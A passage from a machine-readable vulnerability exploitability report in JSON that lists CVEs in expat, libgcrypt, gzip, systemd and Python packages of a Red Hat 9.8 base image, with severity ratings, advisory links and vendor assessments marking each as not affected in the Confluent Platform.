          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41080",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41080"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/26/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41080"
        },
        {
          "url": "https://blog.hartwork.org/posts/expat-2-8-0-released/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/47"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41080"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41080"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/26/1"
        }
      ],
      "published": "2026-04-16T17:16:54+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41989",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.",
      "recommendation": "Upgrade libgcrypt to version 1.10.0-13.el9_8",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47117"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50147"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41989"
        },
        {
          "url": "https://bugzilla.redhat.com/2461063"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461063"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-41989"
        },
        {
          "url": "https://dev.gnupg.org/T8211"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-50147.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:47117"
        },
        {
          "url": "https://github.com/advisories/GHSA-wrv8-79m2-qg24"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-41989.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50147-0.html"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41989"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.10.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41990",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41990"
        },
        {
          "url": "https://dev.gnupg.org/T8208"
        },
        {
          "url": "https://github.com/advisories/GHSA-78pv-qq8x-94px"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41990"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-06-17T10:47:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.10.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41991",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        377
      ],
      "description": "GNU gzip contains a vulnerability in the gzexe utility related to insecure temporary file handling. When the mktemp utility is not available in the user\u2019s PATH, gzexe falls back to constructing a temporary file path based solely on the process ID (PID). This predictable filename is created without exclusive access or existence checks.\nA local attacker can pre\u2011create the predicted temporary file path as a symbolic link pointing to an arbitrary file writable by the victim. When gzexe runs, it follows the symlink and overwrites the target file, resulting in a time\u2011of\u2011check to time\u2011of\u2011use (TOCTOU) condition that allows arbitrary file overwrite.\n\nThis issue has been fixed in the commit 4e6f8b24ab823146ab8776f0b7fe486ab34d4269",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41991"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991/"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gzip.git/commit/?id=4e6f8b24ab823146ab8776f0b7fe486ab34d4269"
        },
        {
          "url": "https://github.com/advisories/GHSA-67v8-88jf-4x6q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41991"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8512-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41991"
        },
        {
          "url": "https://www.gnu.org/software/gzip"
        },
        {
          "url": "https://www.gnu.org/software/gzip/"
        }
      ],
      "published": "2026-06-29T12:16:29+00:00",
      "updated": "2026-07-01T14:02:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.12-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gzip@1.12-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4224",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "When an Expat parser with a registered ElementDeclHandler parses an inline\ndocument type definition containing a deeply nested content model a C stack\noverflow occurs.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/16/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4224"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/196edfb06a7458377d4d0f4b3cd41724c1f3bd4a"
        },
        {
          "url": "https://github.com/python/cpython/commit/24ce88b285f56ee11626cf5e472af3cd8cc7c621"
        },
        {
          "url": "https://github.com/python/cpython/commit/642865ddf4b232da1f3b1f7abcfa3254c4bfe785"
        },
        {
          "url": "https://github.com/python/cpython/commit/af856a7177326ac25d9f66cc6dd28b554d914fee"
        },
        {
          "url": "https://github.com/python/cpython/commit/e0a8a6da90597a924b300debe045cdb4628ee1f3"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb0e8be3a7e11b87d198a2c3af1ed0eccf532768"
        },
        {
          "url": "https://github.com/python/cpython/issues/145986"
        },
        {
          "url": "https://github.com/python/cpython/pull/145987"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4224.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/5M7CGUW3XBRY7II4DK43KF7NQQ3TPZ6R/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4224"
        }
      ],
      "published": "2026-03-16T18:16:10+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
